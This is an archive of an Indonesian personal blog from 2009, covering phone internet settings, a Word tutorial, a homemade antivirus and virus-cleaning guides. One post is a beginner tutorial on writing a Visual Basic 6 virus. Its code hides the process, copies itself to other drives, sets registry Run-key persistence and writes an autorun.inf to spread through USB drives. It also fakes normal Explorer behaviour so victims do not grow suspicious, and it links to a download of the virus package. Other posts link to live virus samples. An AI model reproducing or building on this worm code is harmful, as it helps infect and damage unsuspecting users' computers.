Monday, 28 December 2009

Internetan Hemat Dengan HP

Assalamualaikum Wr. Wb.
Semakin diperlukannya internet dalam kehidupan kita, semakin gencar pula para operator kartu memberikan pelayanan yang terbaik untuk pelanggan setianya.

Tak perlu panjang lebar, langsung saja ke pokok masalah.

Untuk seting paket internet dengan IM3 (Indosat) yakni dengan:
*777# lalu Ok/Yes, 1 (Pilih Paket), 5 (Broadband). Atau cara cepatnya yakni dengan *777*1*5# . Di sana ada pilihan info untuk informasi lebih lanjut. (pulsa 10rb = 15 MB = 7 hari).

Untuk seting paket internet dengan As (Telkomsel) yakni dengan kirim SMS ke 3636, contoh paket 10rb (pulsa 10rb = 35 MB = 30 hari):
FC ON 10000

Tarif bisa berubah sewaktu-waktu. Semoga bermanfaat.

Tuesday, 17 November 2009

Belajar Membuat Program

Belajar Membuat Program
Belajar sampai Bisa
(tidak terlalu susah kok – yuk belajar membuat virus)




Dari benar-benar tidak bisa, menjadi kenal dan bisa mempraktekan hingga mengembangkan menjadi satu kesatuan yang kompleks



Membuat program sudah tidak lagi menjadi hal yang tabu bagi para pengguna komputer, terutama maniak netter. Di dunia maya yang penuh dengan berbagai hal di dalamnya, mereka (netter) saling berinteraksi bertukar pendapat untuk menyelesaikan suatu masalah tertentu. Tak jarang mereka membuat suatu komunitas tertentu agar kesamaan hoby mereka bisa berkembang menjadi suatu hal yang membuat mereka menjadi lebih matang. Tak sedikit pula dana yang mereka keluarkan, seperti pergi ke warnet dengan biaya perjam sebesar Rp. 4.500, atau tagihan perbulan dari beban telepon/HP. Ya, itulah namanya hidup, semua harus dengan pengorbanan.
Hidup yang dibekali ilmu bagi tiap-tiap orang tentu membuatnya menjadi terlihat ahli dari orang lain. Bagiamana jika ia sudah tidak ada? Siapa yang melanjutkannya demi ilmu yang tidak pernah punah ini? Hmmm…, walaupun ilmu tidak akan pernah punah, tapi kalau tidak diwariskan toh tidak akan ada generasi lanjutan, kalau ada itu pun akan sangat lama. Sedikit dan seburuk apa pun ilmu yang diberikan itu akan tetap menjadi ilmu. Dan selama ilmu itu terus diturunkan maka marilah kita cegah kata ‘punah’.
Let’s to learn…!








Baiklah langsung saja disini kita akan mengenal beberapa kode yang bisa diterapkan dalam membuat program berbasis VB 6 (Visual Basic 6.0). Nah sebelumnya kalau Anda disuruh memilih antara “Merusak” dan “Memperbaiki” maka Anda akan pilih yang mana? Walaupun sulit dikatakan tapi “Merusak lebih gampang daripada memperbaiki”, iya kan…? Hohohoho…. 
Nah maka dari itu disini akan dipelajari kode ‘sederhana’ yang bisa dipraktekan dalam membuat virus.


Menyembunyikan Proses
Menyembunyikan Proses disini maksudnya agar proses virus tidak nampak terlihat pada program pengalola proses aktif seperti Task Manager contohnya.

App.TaskVisible = False

Walaupun demikian program akan tetap terbaca oleh Task Manager, yakni pada Tab Processes. Hal ini karena kode tersebut hanya berfungsi pada Tab Applications dari Task Manager. Pada dasarnya kita tidak perlu membuat True pada kode di atas agar program terlihat pada Tab Applications dari Task Manager.

App.TaskVisible = True

Karena pada dasarnya program memang selalu nampak pada Tab Applications dari Task Manager.
Untuk Task Manager itu sendiri dapat kita penggil (jalankan) dengan menekan tombol pada Keyboard, yaitu tombol Ctrl + Alt + Del atau Ctrl + Shift + Esc. Jika ternyata tidak ada respon maka kemungkinan fitur ini telah dialihfungsikan oled virus.


Penggunaan Fungsi If, Then, GoTo
Sesuai artinya, if dalam bahasa Inggris mempunyai arti jika dalam bahasa Indonesia, lalu then adalah maka, dan goto adalah pergi ke.

If App.Path = "C:\" Then GoTo Bar2

Jika berada pada batas C maka selanjutnya pergi ke baris 2.
Ya, mungkin begitulah maksudnya. Sebuah penanganan kondisi yang bagus untuk diterapkan. Mengapa bagus? Karena pada dasarnya kita tidak tau apa yang akan terjadi pada kemudian waktu. Ini seperti sebuah spontanitas atau refleksi dari keadaan tertentu. Misalnya Anda sedang mengendarai kendaraan roda dua terus ada lobang yang lumayan besar di depan jalan, tentu Anda akan menghindar kan? Ya kecuali kalau Anda memang suka masuk lobang. 

App.Path = "C:\"

Kode di atas menunjukkan letak program saat dijalankan. Jika program berada ada Address seperti kode maka akan dijalankan perintah selanjutnya. Nah bagaimana jika program bukan berada pada lokasi tersebut? Maka perintah ini tidak akan dilaksanakan.

GoTo Bar2

Kode ini menunjukkan bahwa perintah selanjutnya adalah pergi ke Bar2. Ini adalah sebuahperintah loncatan yang mana kita harus punya dermaga untuk menambatkan loncatan tadi. Kode yang biasanya digunakan untuk tambatan loncatan itu ialah :.

Bar2:

Yang mana ada penambahan karakter ‘titik dua’ atau ‘:” nya pada nama dermaga atau pemberhentian loncatan/lompatan.


Penanganan Error
Error adalah suatu yang lumrah bagi program, maka dari itu pentingnya melakukan tindakan penanganan sehingga program dapat berjalan lancar.

On Error GoTo A

A:
MsgBox “Error”

Sebuah perintah dimana A: adalah sebagai dermaga untuk bertambatnya suatu Error. Tapi ada juga lho penanganan yang tidak menggunakan dermaga untuk bertambat, yakni

On Error Resume Next

Dimana ketika terjadi kesalahan pada program maka program akan berjalan tersu seolah tidak terjadi apa-apa. Eits…, jika terdapat banyak sekali Error atau sebuah Fatal Error maka Error juga bisa akan tetap terjadi lho. So, keep carefull


Menggandakan Diri
Menggandakan disini dalam artian memperbanyak diri, bukan ganda bilangan (2).

FileCopy App.Path & "\" & App.EXEName & ".exe", "copyan.exe"

Kode untuk mengkopi diri program (pada direktori/folder yang sama) sehingga menjadi lebih dari 1 program yang sama, dengan nama yang berbeda (sesuai keinginan). Baris kode ini akan mengalami Error jika sebelumnya program masih berupa design (belum jadi), maka untuk mendapatkan hasilnya kita harus membuat programnya menjadi file masak, yang berekstensi .exe (dot ekse) itu lho biasanya. 
Jika ingin membuat 2 file sekaligus (file kopian) dalam 1 kali program dijalankan maka tinggal gandakan saja kode di atas dengan memberi nama file kopi yang berbeda dari sebelumnya.

FileCopy App.Path & "\" & App.EXEName & ".exe", "copyan.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", "copyan2.exe"

Nah bagaimana jika file kopi ini berada pada direktori berbeda. Maka penulisannya adalah dengan menambahkan Address.

FileCopy App.Path & "\" & App.EXEName & ".exe", "D:\copyan.exe"





Contoh di atas adalah berfungsi untuk membuat file kopi berada di direktori (D:) D:\, dan seterusnya.

Untuk peletakan penulisan kode, kode biasanya berada ditengah tengah atau baris kosong yang dimaksudkan sebagai baris peletakan kode.
Lihatlah gambar di bawah yang mencoba menyelaskan bahwa ketika suatu tombol di klik maka akan disediakan baris kosong, dan isikanlah kode perintah program kita.














Nah lupa. Sebelumnya, coba Anda perhatikan panah pada gambar sebelah kiri! Panah itu menunjuk pada sebuah Command Button (tombol perintah), dan Form1 yang terlihat bentuk kotak ada titik-titiknya itu ialah Form atau boleh dibilang alas atau dasar pembuatan program (tapi ada juga lho yang gak pakai alas, langsung bikin atap. Ckckckck…. ). Dalam pembuatan awal program, kita diperkenankan untuk menata sedemikian rupa program yang kita buat. Contohnya pada gambar di atas, yang mana saat programmer menekan Command Button maka tidak terjadi apa-apa melainkan disuruh memasukkan kode program. Terus, kapan Command Button akan berfungsi? Ya saat kita jalankan programnya, tuh lihat di atas layar Visual Basic 6 ada tombol seperti tombol Play (mainkan) pada pemutar musik, tombol itulah yang berfungsi untuk menjalankan program yang dibuat tadi.


Memanipulasi Registry
Ibarat system saraf suatu organ, maka registry adalah system saraf pusat dari OS Windows, yang akan mengatur sedemikian rupa jalannya proses program.

Shell "Reg Add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v Setup /t REG_SZ /d C:\Windows\Noa.exe"

Kode ini berfungsi menjalankan virus pada saat komputer dihidupkan, biar otomatis. Pada kode di atas seharusnya ditulis satu baris saja, namun karena lembaran ini tidak cukup lebar maka ditulis (sambung) ke bawah deh. Kode itu menggunakan perintah cmd yang letaknya berada pada Address ‘C:\WINDOWS\system32\cmd.exe”. Lho…, padahal Visual Basic tapi kok kenapa pakai cmd lagi? Itulah kelebihn dari VB (Visual Basic), dia bisa menggunakan perintah cmd juga, yaitu dengan menggunakan perinah Shell. Untuk keterangan lebih lanjut tentang cmd silakan pelajari sendiri ya! 
Untung kemarin gue sempat berkenalan sama cmd, walaupun cuma sebentar. Ckckck….

Menjalankan Program Lain
Menjalankan atau mengeksekusi program dapat berguna sebagai alarm, dimana setiap program harus bangun pada saat tertentu.

Shell "copyan.exe"

Sebuah fungsi alarm untuk menjalankan file “copyan.exe” (berada pada direktori yang sama) pada saat yang diinginkan (nanti setelah ini dibahas fungsi watu). Bagaimana jika ingin menjalankan program yang lain (berbeda direktori)? Yaitu dengan menambah Address.

Shell "C:\Windows\Notepad.exe"

Kode di atas berfungsi menjalankan (eksekusi) Notepad yang berada pada Address C, tepatnya pada direktori Windows.
Eits…, ternyata masih pakai perintah dari cmd ya…?! 


Kotak Pesan
Sedikit iseng untuk virus yang sebenarnya tidak ganas sama sekali.

MsgBox "Virus ganas telah menyerang", vbCritical, "Error"

MsgBox atau message box atau kotak pesan akan membuat kita bertanya ada apa gerangan dengan komputer terecinta. 





















File Pemicu
Ibarat ranjau yang ketika terinjak maka dia akan meledak, ya itulah pemicunya. Ketika user (pengguna komputer) awam sebut saja korban, tidak menginstall Antivirus di komputernya (wek, padahal penulis sendiri juga gak nginstallnya. ) sedang mencolokkan flashdisk bervirus, yang terdapat file Autorun.inf didalamnya, maka ketika ia tidak hati-hati membuka data di flashdisknya, itulah saat dimana virus meledak (aktif).

Dim C As String
C = "C:\Autorun.inf"
Open C For Output As #1
Print #1, "[autorun]"
Print #1, "shell=explore"
Print #1, "shell\explore\command=Noa.exe"
Print #1, "explore=Noa.exe"
Print #1, "open=Noa.exe"
Print #1, "shell=open"
Print #1, "shell\open\command=Noa.exe"
Close #1

Kode di atas adalah perintah untuk membuat file, masih rentan terhadap error, khususnya ketika menemukan folder yang memiliki nama yang sama dengan file, karena fungsi di atas hanya untuk menangani file bukan folder. Tetapi tidak menutup kemungkinan lho Errornya diakibatkan oleh file. 

If App.Path = "C:\" Then Shell "explorer C:\", vbNormalFocus

Nah, kode ini berguna ketika dilakukan peng-eksekusi-an program melalui file “Autorun.inf”, yang mana ketika program berjalan maka seolah-olah tidak terjadi apa-apa, karena telah diberi perintah untuk menjalankan sesuatu seperti apa yang diinginkan korban. Tapi jika perintah ini dilakukan perulangan maka tentu akan terjadi keanehan, maka harus hati-hati ya, jangan sampai ada yang curiga. Ckckck….

Shell "explorer C:\"

Perintah dari cmd agar membuka direktori atau address C:\.

Setelah melakukan perintah dengan menggunakan perintah dari cmd (yang ada shell itu lho) maka lakukan Normal Focus.

vbNormalFocus

Perintah dari VB agar melakukan tindakan Normal yakni menampilkan layar program yang dibuka. Untuk perintah lainnya silakan pelajari dan kembangkan sendiri ya!



Mem-Paste-kan Kata
Copy-Paste adalah sebuah fitur yang memanjakan user, dimana user tidak usah membuat ulang apa yang sudah ada.

Clipboard.Clear
Clipboard.SetText "Hohoho"

Kode di atas berfungsi untuk Mem-Paste (menempel) kata yang diinginkan pada sebuah media pengolah kata atau tullisan seperti Notepad, Microsoft Word dan sebagainya, bahkan pada fungsi Rename (ubah nama) pada file. Kata “Hohoho” adalah kata yang akan ditempel (Paste). Fungsi baris diatasnya adalah untuk mengosongkan (Clear) teks sebelumnya (jika sebelumnya telah meng-Copy teks), sehingga yang ter-Paste nantinya adalah kata “Hohoho” tadi.


Fungsi Waktu
Ibarat mesin reminder (pengingat), jika sewaktu-waktu kita lupa akan suatu hal, hari ulang tahun atau tanggal jadian (pacaran) misalnya, maka mesin itu akan memberitahukannya untuk kita. Hmmm…, itulah mesin, ia tak pernah lelah hingga ia benar-benar tidak bisa berfungsi lagi.

Year(Now) = 2009
Month(Now) = 11
Day(Now) = 22
Hour(Now) = 32
Minute(Now) = 59
Second(Now) = 59

Jika digabung maka menghasilkan kode seperti dibawah dengan penambahan MsgBox (message box/kotak pesan). Untuk fungsi And berguna untuk menambahkan antar kata/kode (fungsi bertingkat) sehingga kode dapat berjejer menjadi satu baris.

If Year(Now) = 2009 And Month(Now) = 11 And Day(Now) = 22 And Hour(Now) = 13 And Minute(Now) = 59 And Second(Now) = 59 Then
MsgBox "Happy Birthday!"
End If

Kode di atas berfungsi ketika pada waktu yang telah ditentukan ia akan melakukan tindakan yang telah disiapkan sebelumnya oleh programmer. Untuk fungsi waktu berlaku format 24 jam, sehingga jika ingin menentukan waktu pada jam 11 malam (11 PM) maka angka yang digunakan adalah 23, sedangkan jam 11 siang (11 AM) maka penulisan tetap 11.



Sedangkan penggunaan fungsi Or adalah fungsi setara antar kata, namun entah mengapa fungsi ini mengalami Error pada kesetaraannya. Coba perhatikan!

If Minute(Now) = 11 Or 10 Then
MsgBox Minute(Now)
End If

Lihat, disana penulis sengaja membuat pengurangan waktu, maksudnya waktu dipantau dari yang tertinggi lebih dahulu baru ke terendah. Hmmm…, VB akan tetap menghitung waktu yang ada atau waktu yang sedang berjalan. Maka, jika waktu sekarang bukan merupakan menit ke 11 atau menit ke 10 secara otomatis VB akan membaca menit sekarang dan memberikan outputnya pada kita. Hal ini juga berlaku jika kita masukkan 61 sebagai menit pada kode diatas, atau bahkan yang lebih tinggi, dan juga menggunakan perbandingan menit yang sama. Hmmm…. Aneeeh…?
































Mungkin sekian dulu ya pembelajaran kita.
Mohon maaf kalau ada kesalahan dalam penulisan dan sebagainya!
Nanti kalau penulis ada waktu luang atau ada permintaan dari teman mungkin akan ada lagi tulisan lainnya yang mungkin akan lebih menarik lagi. 
Semoga waktu tak begitu pendek! 
See you….
Happy coding….




































11-11-2009, Paray
Side of Kahayan River
Noa









-------------------------
Oiya, mungkin artikel yang ada di blog agak rancu, maka silakan download saja paketnya di: (http://www.4shared.com/get/153707179/d1becff/Noa_Vir.html)

Friday, 9 October 2009

Setting Internet Untuk HP

Kemarin penulis mengalami kesulitan dalam pengaturan internet untuk HP. Wah..., susah bangeeet deh pokoknya, sampai nanya sana-sini ke teman, garuk2 kepala jadinya. Alhamdulillah sekarang sudah bisa, dan inipun (artikel ini) dibuat penulis melalui HP + aplikasi Opera Mini.
Cara setting internet HP nya adalah dengan mengatur (aplikasi/melamarkan) jaringan ke operator kartu. Kan penulis sudah lama punya kartu yang GPRSnya nyala, tapi kadang2 pada beberapa pengaturan HP tertentu ada yang agak ribet mengaturnya, maka solusinya (untuk pengguna Indosat) yaitu dengan mengirim SMS ke 3000 (gratis deh kemarin kyaknya).
Format penulisan adalah: GPRS Merek_HP Tipe_HP
Contoh: GPRS Nokia 6630

Pada contoh di atas penulis mengatur (menyeting) agar Nokia 6630 bisa menggunakan layanan internet dari HP, tentunya berkat layanan dari operator terkait. Nah, jika SMS balasan tidak 'memuaskan' silakan gunakan saja format penulisan di atas, tapi khusus Nokia lho ya. Soalnya kemarin teman BeKaBe penulis (sebut saja Eer / Ida Ernawati) tidak bisa dengan menulis tipe HPnya, tapi masih bisa 'diakalin' dengan menulis seperti contoh di atas. :D
Terima kasih operator. ]^_^[



Terima kasih kepada:
Ayah ku tercinta yang telah memberikan kesempatan untuk aku berimajinasi dan berkarya.
(coz klo gak dibeliin ayah ya mau gimana lg, paling bisa gigit jari, hihihi....). ]^.~[



Regard,
Neo BeKaBe

Thursday, 10 September 2009

Belajar Microsoft Word - 1


Assalamu'alaikum Wr, Wb.


Alhamdulillah akhirnya tutorial berseri jadi juga. Pada kesempatan ini (artikel ini) kita akan belajar dengan Microsoft Word. Mungkin kita (para blogger) sudah kenal akrab sama yang namanya Microsoft Word, tapi bagaimana dengan rekan-rekan yang lain, generasi penerus kita misalnya? Ya mereka perlu belajar. So, mungkin bagi yang sudah mahir bisa lewatkan saja.
Seperti beberapa artikel sebelumnya pada blog BeKaBe ini, bahan pembelajaran dapat Anda miliki dengan cara mendownloadnya. Ya kurang lebih E-Book (Electronic Book)lah.
Sekedar pemberitahuan nih, pada seri ini (seri - 1 / seri pertama) bab yang dibahas secara garis besar hanya 2 bab saja, secara garis kecil pada bab 2 sudah mewakili jika ada dibuatkan bab-bab lainnya dan bahan yang diajarkan adalah sebagai berikut:

BAB 1 Langkah Awal
A. Membuka atau Menjalankan Aplikasi Microsoft Word
B. Tampilan Awal Microsoft Word

BAB 2 Praktek dan Penjelasannya
A. Standar Pengaturan Awal
B. Mengubah Jenis Font
C. Memilih Font Arial Black
D. Tampilan Font Arial Black
E. Rata Tengah (Center)
F. Rata Kanan (Align Right)
G. Rata Kanan-Kiri
H. Jarak ke bawah
I. Jarak ke samping
J. Huruf Awal menjadi lebih Besar
K. Mengubah Warna
L. Menyisipkan Gambar pada Tulisan
M. Membuat Baris Baru
N. Membuat Tulisan bergaris TEbal
O. Membuat Tulisan Miring
P. Membuat Tulisan bergaris Bawah



Ya seperti itulah kira-kira yang akan dibahas pada tutorial ini. Rencana untuk tutorial (pengajaran tambahan) seri - 2 adalah membahas pembuatan 'titik-titik daftar isi', ya begitu lah teman-teman menanyakannya pada Neo, hehehe.... Buat Aditnya Daniawan dan Alfita Husnul Khotimah nih jangan lewatkan seri - 2 tutorial Neo ya, Neo jamin gak nyesal deh kalau dah ngebacanya, toh kalau ada yang kurang jelas masih bisa kalian tanyakan lewat SMS juga kan, hihihihi....
Buat teman-teman BeKaBe yang lain maaf ya gak Neo absen! Nanti kalau Neo terinspirasi dari kaian Insya Allah salah satu atau salah banyak dari kalian akan Neo absen juga, wkwkwkwk....


Silakan download di: http://www.ziddu.com/download/6520622/BMW_TB-1.zip.html


Regard,

Neo BeKaBe

Friday, 4 September 2009

Award kedua


Dapat Award kedua nih dari si Agus

Makasih ya nak, maaf baru bisa posting awardnya.

Baik lah saya juga gak akan menahan pemberian award ini para blogger bisa mendapat kan award ini juga dengan syarat sebagai berikut: bagi yang menerima Award, pasang diblog Anda dengan mencantumkan nama orang yang telah memberikan award dan link blog-nya.

● Bagikan lagi award ini kepada blogger lainnya. Jangan lupa untuk menghubungi blogger agar mereka tahu bahwa mereka telah terpilih untuk menerima award ini. Tinggalkan pesan di shoutmixnya, oke dari pada saya pendam nech award sampai bekarat di sini akan saya beri buat sahabat-sahabat ku yaitu:

-Mia

-si Kumbang

-SoffTis

-Aviezab

Shalat Tarawih (Penerapan pada Anak)

Assalamu’alaikum Wr, Wb.

Bulan puasa bulan yang penuh berkah.

Tarawih adalah shalat yang dilaksanakan pada malam bulan Ramadhan tepatnya setelah shalat Isya, jumlah rakaatnya 20 rakaat dan 10 kali salam ditambah 3 rakaat shalat witir dan 2 kali salam.

Kalau dilihat dari rakaat sih memanglah banyak (apalagi yang tidak sering shalat,hihihi…), tapi tidak apalah masa orang sanggup tapi kita tidak sanggup. :-)

Ya “Masa orang sanggup tapi kita tidak sanggup”, semoga kalimat ini bisa memacu kita!

Semua orang tentunya memiliki kesibukan masing-masing, entah mengajar, belajar, menulis, blogging, programming, atau apalah tidak bisa disebutkan satu-satu karena terlalu banyak. :-)

Namun alangkah indahnya jika kita mau meluangkan sedikit waktu kita untuk melaksanakan shalat tarawih. Mungkin bagi orang tua memang siap sedia melaksanakan shalat tarawih berjamaah di mesjid, namun bagaimana dengan anak-anaknya?

Tapi bagaimana pula jika orang tua pun enggan ke mesjid untuk melaksanakan shalat tarawih di mesjid, bagaimana pula dengan anak-anaknya?

Ibarat sebuah peribahasan “Buah jatuh tidak jauh dari pohonnya”, begitu pula dengan anak kita. (upppsss…,penulis belum punya anak,masih muda :-)).

-Cerita ini hanyalah fiktif, maka mohon maaf jika terjadi kesamaan-.

Sebuah keluarga (ibarat keluarga A) yang terdiri dari ayah, ibu, kakak dan adik adalah keluarga yang sakinah mawahdah wa rahmah, mereka tidak mau ketinggalan dalam melaksanakan ibadah baik itu wajib maupun sunah.

Bagaimana dengan keluarga B. Sebuah keluarga yang terdiri dari ayah, ibu, kakak dan adik adalah sebuah keluarga yang tidak terlalu taat namun tetap selalu menjalankan kewajiban. Bagaimana jika keluarga B ini mau berubah menjadi layaknya keluarga A? Coba kita lihat prosesnya: Seorang ayah yang memiliki kerja sampingan di malam hari sebagai penjual jagung bakar yang ditemani isterinya. Kakak seorang pelajar SMU, dan adik pelajar SD yang mengerjakan PR sekolah atau belajar. Sama pula halnya keluarga A.

Suatu malam ayah dari keluarga A sepulang dari tarawih datang menghampiri ayah di keluarga B. “Hai saudara ku, dapat banyak kah kamu hari ini?”, “Tidak saudara ku. Kau ‘lihatlah ini’, masih banyak dan hampir tidak tersentuh pula”, jawab ayah keluarga B. “Tak apa saudara ku. Lihatlah diriku, aku sengaja libur, karena aku ingin mengajak keluarga ku dalam melaksanakan tarawih berjamaah, toh setahun sekali, kalau kerja mah kita tiap hari tinggal rezekinya saja yang tidak setiap hari maka marilah kita meminta pada-Nya, Insya Allah akan diberikan-Nya ”, “Ya saudaraku, Insya Allah mulai besok aku ikut ‘menjalankannya’”, jawab ayah keluarga B.

Keesokan malam, ayah, ibu, adik keluarga B ingin berangkat ke mesjid. “Tole, kau tak ikut nak?”, tanya ibu kepada kakak. “Tidak Bu, saya lagi ngerjai PR”. “Lho…, kan PRnya bisa nanti saja. Lihatlah adik mu ini, apa kau tidak malu, adik mu saja sudah siap ‘berangkat’ bersama ayah dan ibu mu ini, apakah kau mau jaga rumah nak?”, tanya ibu dengan ramah kepada kakan. “Iya Bu, baiklah saya juga ikut ‘berangkat’, daripada saya sendirian jaga rumah”, jawab kakak. Dan Alhamdulillah akhirnya keluarga B pun berubah seperti halnya apa yang ada pada keluarga A.

Nah dari cerita di atas terlihat bahwa kakak dari keluarga B berubah pikiran sehingga dia berjalan searah keluarganya (walaupun kenyataannya tak semudah itu). Ya ini lah ibarat “Buah jatuh tidak jauh dari pohonnya”.

Semoga ada yang bisa digali dan diambil pelajaran dari cerita ini.

Kejanggalan dalam penulisan ini adalah disengaja, maka kiranya pembaca dapat menerjemahkannya sendiri.

Jika terjadi ‘kesamaan’ yang tidak dinginkan dalam realita maka itu hanya kebetulan dan mohon dimaafkan, karena ini hanyalah tulisan fiktif.

Ambil baiknya, tinggalkan yang buruknya.

Mohon maaf atas segala kekurangannya.

Wassalam….

Tuesday, 25 August 2009

MANModAV 0.2 (versi 2)



Assalamu'alaikum Wr, Wb.

MANModAV versi dua (MANModAV 0.2) sudah rilis nih untuk memperbaiki beberapa kekurangan pada MANModAV versi 1 (MANModAV 0.1) dan tentunya penambahan signature virus (database) yang sudah menjadi kewajiban oleh sebuah AntiVirus, kali ini signature virus berjumlah 90.
Pada versi kali ini MANModAV mencoba membuat "Auto Alert" dengan merujuk situs (Blog) BeKaBe sebagai situs penunjang dalam pembersihan virus komputer yang tidak bisa dibersihkan oleh MANModAV. Untuk "Auto Alert" itu sendiri akan berfungsi pada kondisi tertentu dan jikalau metode ini terbukti mujarab (wah...,mang obat :) ) maka kemungkinan MANModAV selanjutnya akan membuat "Auto Alert-Auto Alert" yang muncul pada saat proses scaning (pemindaian virus) selesai. Namun jika metode ini mengganggu maka lihat saja apa yang ada (terjadi) pada versi selanjutnya. :)

Silakan download di: http://www.ziddu.com/download/6199750/MANModAV0.2.zip.html
atau di: http://www.4shared.com/file/130109758/8da6456d/MANModAV02.html


Tenang saja, gratis kok. ;-)

Keep careful guys! ]^_^[

Salam bebas virus.


Neo BeKaBe

Monday, 17 August 2009

Mebersihkan Virus Coficker - Recycler VMX (Perbaikan)

Assalamu'alaikum Wr, Wb.

Maaf nih ada perbaikan pada artikel sebelumnya (Membersihkan Virus Conficker - Recycler VMX).
Pada artikel perbaikan ini file pendamping dilengkapi dengan file virus yang bersangkutan.

Begini ceritanya, tanggal 16 Agustus kemarin ada technical meeting outbond 2009 di STMIK Palangka Raya, kita-kita (angkatan baru) musti daftar ulang untuk mengikuti outbond. Registrasi (daftar ulang)nya disuruh mengisi biodata sama mengumpul file foto 3X4 baik dari flashdisk maupun CD, tapi berhubung saya baru tau hari itu juga ya saya tidak punya (tidak sedia) file foto deh, tapi setelah saya ingat-ingat saya punya foto di flashdisk tepatnya pada file Membersihkan Virus Conficker - Recycler VMX.pdf terus saya coba kumpul deh tu file, tapi saya lupa meletakkan di mana di dalam flashdisk (coz belum bersih-bersih karena sibuk bereksperimen maupun nulis hasil eksperimen,jadi berantakan deh file saya), eh ternyata kakak panitia yang ngurusin itu gak bersahabat, dia gak mau bantuin nyari file itu, ya sudah saya tanya kira-kira ada komp yang bisa saya pakai untuk nyari file nya gak, katanya gak ada dah penuh semua, huuuh putus deh harapan saya untuk membereskan satu tugas dari kampus, soalnya saya gak eh tidak mau menundanya takut kenapa-napa. Tapi Tuhan berkata lain, entah mengapa tiba-tiba saya ada malaikat yang mau menolong saya, dia rela meluangkan sedikit waktunya untuk bantuin saya mencari file saya yang sembunyi itu dengan laptopnya yang sama jenisnya dengan Neo (hihihi,kebetulan banget nih mereknya sama,so gw kan lumayan mahir menggunakannya,cuma lumayan lho ya,hihihihi). Setelah beberapa menit mencari akhirnya ketemu juga tu foto, ya walaupun fotonya tidak resmi tapi kata panitianya boleh saya kok, wah tunggu apa lagi, sikat bang. Sebagai balasan kebaikan mas senior itu (yg disebut malaikat tadi) saya menawarkan pemberian file tutorial itu pada beliau, dan dengan senang hati beliau menerimanya, semoga saja bermanfaat, kalau tidak sekarang ya dilain waktu. Ngomongon soal tutorial itu beliau nanya kalau dipaket itu ada file virusnya juga, aduh anjrit saya lupa mengikut sertakan file virusnya, hanya dua file pembasmi virus saja yang saya sertakan pada paket tutorial itu. Nah karena itulah artikel ini jadi sebagai perbaikan artikel sebelumnya, sehingga pembaca (Anda) khususnya yang tertarik sama dunia virus bisa bereksperimen (melakukan percobaan) sendiri demi mendapatkan hasil analisa (eksperimen).

Silakan sedot saja di: (http://www.4shared.com/file/125586877/49634bfb/_2__Paket_MVC_-_R_VMX.html
)

Atau kalau mau mendownload/upload sampel virus silakan di 4shared BeKaBe: http://bekabe.4shared.com

Terima kasih!



Salam bebas virus!

Neo BeKaBe

Thursday, 13 August 2009

Mebersihkan Virus Coficker - Recycler VMX


Assalamu'alaikum Wr, Wb.

Maaf nih gak bisa nulis (posting) artikel langsung di blog, soalnya gak dapat jaringan, mau ke warnet kantong pun kering karena belum kerja, tapi postingan ini tetap dari warnet kok. Hihihihi....

Baiklah langsung saja kita ke topik! Kali ini BeKaBe menyediakan tutorial singkat yang berjudul "Membersihkan Virus Conficker - Recycler VMX". So, bagi yang tertarik silakan sedot (download) saja. Sebagai pemberitahuan nih, file .zip-nya di kasih password, so (maka) silakan konfirmasikan kembali ke artikel ini baik itu lewat komen atau Shout Box dan sebagainya, ya!
Donwload di http://www.ziddu.com/download/6023455/PaketMVC-RVMX.zip.html

Salam bebas virus!

Neo BeKaBe

Pemulihan Komputer Akibat Ulah Virus -Checkpoint Method-


Assalamu’alaikum Wr, Wb.

Sebelumnya saya atas nama pribadi mohon maaf karena merubah (tidak menyesuaikan) tema selayaknya (membahas kegiatan kelas) seperti yang ada pada situs blog ini. Karena kalau dirubah total Neo takut akan melupakan hal yang pernah Neo alami di BeKaBe yang mana telah membuat Neo seperti ini. Dan kalau blog ini tidak diisi apa-apa (karena kehabisan bahan) takutnya blog ini tidak terawat lagi, takut nanti hilang terkikis oleh sang waktu. Maka mubajir kalau Neo membuat blog baru hanya untuk kepentingannya pribadi sehingga melupakan blog BeKaBe ini. BeKaBe, MAN Model, I always love you. ?

Oke, cukup sudah pembukaannya sekarang kita akan bahas mengenai ‘salah satu metode pemulihan kembali komputer yang terinfeksi virus’ serta sedikit eksperiman penulis dengan virus yang bernama “Limit.exe”. MANModAV Versi 0.1 sebenarnya sudah mengenali (mendeteksi/memiliki database/singnature) file virus ini, namun tidak bisa memulihkan komputer jika file virus ini sudah aktif (tereksekusi) pada komputer korban, maklum penulis hanyalah seorang yang tidak berdaya jika tanpa kuasa-Nya (cieee…). Lagipula perlu Anda ketahui bahwa virus ini adalah virus impor buatan programmer luar negeri yang sudah master tentunya (sok tau nih,padahal kenal saja tidak). File utama dengan nama Limit.exe ini bukanlah sekedar virus biasa (maaf, untuk program jahat seperti malware, trojan, virus, worm, Neo tulis dengan nama virus), virus ini cukup membandel karena memiliki pewaktu ditubuhnya dan file infection (penularan) yang ditanamkan entah di mana? Harap maklum, penulis bukanlah analis (penganalisa/penyelidik) professional, masih banyak yang belum penulis ketahui.
Tentunya ‘semakin kita tau banyak, semakin tau bahwa kita tidak tau banyak’.


Yuk kita lihat dulu wujud virusnya!





Maaf, untuk artikel selengkapnya silakan download di sini http://www.ziddu.com/download/6023329/PemulihanKomputerAkibatUlahVirus-CheckpointMethod-.zip.html!

Wednesday, 15 July 2009

AntiVirus Baru 2009 (MANModAV)



Satu lagi AntiVirus Indonesia yang mencoba melebarkan sayapnya (Juli 2009) (ciee..., mu terbang ya bang?) :).
Dengan menggunakan databasenya sendiri, MANModAV mencoba untuk memilah dan memilih yang mana file bervirus, yang mana file bebas virus. (saring bang....) :)
Saat ini (versi 1), MAN Mod AV memiliki signature 71 (virus, worm, trojan dicampur jadi 1) :)
Seperti program FreeWare lainnya, MANModAV dapat Anda miliki secara gratis. (senangnya ada program gratis lagi..., sedot yuk!).

Bagi yang mau mencicipi, silakan klik ini untuk donwload.

Mohon maaf atas segala kekurangannya!

Semoga bermanfaat!


Regard,
Neo BeKaBe

Tuesday, 23 June 2009

BEKABE TOUR ZIARAH



